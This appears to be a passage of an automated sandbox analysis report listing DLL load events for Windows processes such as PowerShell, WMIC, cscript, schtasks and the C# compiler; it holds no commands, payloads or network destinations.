Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
Source: C:\Windows\System32\cscript.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\cscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
Source: C:\Windows\System32\cscript.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\cscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
